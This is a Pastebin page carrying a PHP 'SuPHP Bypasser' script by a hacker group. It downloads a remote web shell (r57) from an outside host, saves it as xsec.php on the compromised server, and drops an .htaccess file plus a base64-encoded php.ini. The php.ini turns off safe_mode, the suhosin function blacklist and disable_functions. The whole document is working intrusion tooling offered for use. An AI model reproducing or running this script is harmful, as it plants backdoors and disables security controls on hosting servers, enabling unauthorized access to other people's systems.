Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?
- /*
- Coded By : xSecurity
- Homepage : sec4ever.com
- Email : b0x@hotmail.com
- Blog : drkroooz.wordpress.com
- Greets 2 : b0x - No-QRQR - R.B.G HaCkEr - DamaneDz - FoX HaCkEr - is-sec.com
- */
- echo "<form method='POST'>
- <title>SuPHP Bypasser</title>
- <pre>Bypass SuPHP :D</pre>
- <input type='text' name='path' value=".dirname(__FILE__)." style='font-family: Tahoma size: 2pt ; color: red; border: 1px dotted red'>
- <input type='text' name='shell' value='http://c99.gen.tr/r57.txt' style='font-family: Tahoma size: 2pt ; color: red; border: 1px dotted red'>
- <input type='submit' value='Bypass' name='start' style='font-family: Tahoma size: 2pt ; color: red; border: 1px dotted red'><br>";
- echo "<textarea rows='4' cols='60' style='font-family: Tahoma size: 2pt ; color: red; border: 1px dotted red'>xSecurity Mode :- \n";
- if($_POST['start']) {
- $path = $_POST['path'];
- $file = $_POST['shell'];
- $htaccess = "suPHP_ConfigPath $path/xsecurity/php.ini";
- $phpini = "c2FmZV9tb2RlID0gT0ZGCnN1aG9zaW4uZXhlY3V0b3IuZnVuYy5ibGFja2xpc3QgPSBOT05FCmRpc2FibGVfZnVuY3Rpb25zID0gTk9ORQ==";
- $dir = "xsecurity";
- if(file_exists($dir)) {
- echo "[+] xSecurity Folder There Before :)\n";
- } else {
- @mkdir($dir); {
- echo "[+] xSecurity Folder Created :D\n";
- } }
- # Generate Sh3LL
- $fopen = fopen("xsecurity/xsec.php",'w');
- $shell = @file_get_contents($file);
- $swrite = fwrite($fopen ,$shell);
- if($swrite){
- echo "[+] Sh3LL Has Been Generated Name : xsec.php \n";
- } else {
- echo "[~] Can't Generate Sh3LL\n";
- }
- fclose($fopen);
- # Generate Htaccess
- $hopen = fopen("xsecurity/.htaccess", "w");
- $hwrite = fwrite($hopen, $htaccess);
- if($hwrite){
- echo "[+] htaccess Generated\n";
- } else {
- echo "[~] Can't Generate Htaccess\n";
- }
- fclose($hopen);
- $ini = fopen("xsecurity/php.ini" ,"w");
- $php = fwrite($ini, base64_decode($phpini));
- if($php){
- echo "[+] PHP.INI Generated";
- } else {
- echo "[-] Can't Generate PHP.INI";
- }
- }
- echo "</textarea><pre><center>
- [!] if you got [ internal server error ] Thats Mean Bypass Dosen't Work :)
- Coded By xSecurity | Homepage : sec4ever.Com
- Greets 2 : b0x - NoQRQR - R.B.G - is-sec.com | Design <u>ZaIdOoHxHaCkEr</u> <3<3</center></pre>";
- ?>
Add Comment
Please, Sign In to add comment